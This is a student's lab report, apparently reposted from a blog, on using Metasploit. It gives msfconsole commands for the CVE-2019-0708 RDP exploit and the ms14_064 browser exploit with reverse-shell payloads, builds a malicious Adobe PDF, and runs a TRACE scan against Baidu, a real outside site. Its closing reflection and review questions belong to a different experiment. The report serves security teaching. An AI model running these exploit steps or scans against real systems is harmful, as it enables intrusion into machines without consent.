2019-2020-2 20175326 李一潇《网络对抗技术》Exp6 MSF基础应用

2019-2020-2 20175326李一潇《网络对抗技术》 Exp6 MSF基础应用

一、实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路

  • 主动攻击实践
  • 针对浏览器的攻击
  • 针对客户端的攻击
  • 成功应用任何一个辅助模块

二、实验原理

  • MSF攻击方法:
    • 主动攻击:扫描主机漏洞,进行攻击
    • 攻击浏览器
    • 攻击客服端
  • MSF的六种模块
    • 渗透攻击模块Exploit Modules
    • 辅助模块Auxiliary Modules
    • 攻击载荷Payload Modules
    • 空字段模块Nop Modules
    • 编码模块Encoders
    • 后渗透攻击模块Post
  • MSF的三种用户操作界面
    • msfconsole
    • Armitage
    • webgui

三、实验步骤

1.主动攻击实践:cve_2019_0708(唯一)

在本次实验中,大部分的同学采用的是ms漏洞,ms是代表微软的漏洞,如ms08-067 那么08是代表2008年微软出的漏洞,067是代表08年第67个漏洞;
而这里我采用的是cve漏洞,CVE是Common Vulnerabilities and Exposures的缩写,意思是通用漏洞。它是一个漏洞字典,有MITRE维护。
这里采用的是cve_2019_0708漏洞,2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统,此漏洞是预身份验证且无需用户交互。
打开msfconsole,使用cve_2019_0708查询针对该漏洞可以运用的攻击模块,选择对应模块后再使用show payloads查看攻击载荷

使用show targets可以查看这个漏洞波及的系统版本

使用以下命令可以对靶机进行攻击

set payload generic/shell_reverse_tcp //tcp进行反向回连
set LHOST 192.168.44.128 //攻击机ip(kali)
set LPORT 5326 //设置攻击端口
set RHOST 192.168.1.26 //靶机ip(win 7),特定漏洞端口已经固定
set target 0 //自动选择目标系统类型,匹配度较高
exploit //进行攻击

发现侵入成功

在查询资料的时候,如果针对cve_2019_0708漏洞使用POC进行攻击会使靶机出现蓝屏现象,这里没有尝试。
防御RDP远程桌面的方法
1.关闭对应端口
2.关闭远程桌面服务
3.开始防火墙,禁止端口通过防火墙
4.为系统打补丁

2.针对浏览器的攻击:ms14_064

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,
远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...
metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution
在选择exploit/windows/browser/ms14_064_ole_code_execution模块后,我们使用以下命令来进行操作

set payload generic/shell_reverse_tcp //tcp进行反向回连
set LHOST 192.168.44.128 //攻击机ip(kali)
set LPORT 5326 //设置攻击端口
set RHOST 192.168.1.26 //靶机ip(win 7),特定漏洞端口已经固定
set target 0 //自动选择目标系统类型,匹配度较高
exploit //进行攻击

这时我们会得到一个连接,在靶机上打开该连接,建立会话

此时,主机就完成了对靶机的入侵,可以在主机上进行操作。

3.针对客户端的攻击:Adobe

Adobe阅读器漏洞:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。
msfconsole中使用windows/fileformat/adobe_cooltype_sing,使用以下命令生成恶意构造的pdf文件

set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.44.128 //攻击机ip
set LPORT 5326 //攻击端口
set FILENAME 20175326.pdf //设置生成pdf文件的名字
exploit //攻击

生成的恶意pdf文件在/home/liyixiao/.msf4/local/20175326.pdf下面,将该文件拷贝到靶机当中;
在靶机当中打开文件,并在主机当中输入exploit来进行回连

4.成功应用任何一个辅助模块:trace

scanner/http/trace模块可以帮助我们检查主机是否易受跨站点跟踪的攻击
这里我们在选择scanner/http/trace模块后,对百度进行测试


我们可以发现百度特别容易遭受到受到跨站点跟踪的攻击。

四、实验心得

本次实验是网络攻防的第五次实验,我们学习如何了一些搜索的小技巧和如何对漏洞进行扫描,信息搜索对我们平时的生活和学习有很大的帮助,在今天搜索引擎良莠不齐的情况下,可以帮助我们更快的找到我们所需要的信息,与我们的生活息息相关。漏洞扫描则是和我们前几次的实验有关,通过漏洞扫描技术可以帮助我们更好的保护我们的网络安全。在本次实验中,整体不算复杂,最大的困难就是安装openvns,遇到了很多困难,在参考别人的博客和咨询同学后得到了解决。

五、思考题

  • 哪些组织负责DNS,IP的管理
    DNS和IP地址管理由美国政府授权的ICANN统一管理,地址支持组织(ASO)负责IP地址系统的管理,域名支持组织(DNSO)负责互联网上的域名系统(DNS)的管理,协议支持组织(PSO)负责涉及Internet协议的唯一参数的分配
    全球一共有5个地区性注册机构:ARIN(北美地区),RIPE(欧洲地区),APNIC(亚太地区),LACNIC(拉丁美洲美洲),AfriNIC(非洲地区),中国仅拥有镜像服务器(备份)
  • 什么是3R信息
    注册人(Registrant)、注册商(Registrar)、官方注册局(Registry)
  • 评价下扫描结果的准确性
    在查询资料的时候说,扫描结果可能不准确,但是在实验中的扫描结果都较为准确且详细,如果不是有特殊的专业要求,这些扫描方法完全够用。

猜你喜欢

转载自www.cnblogs.com/lyx-hhhhh/p/12815153.html
今日推荐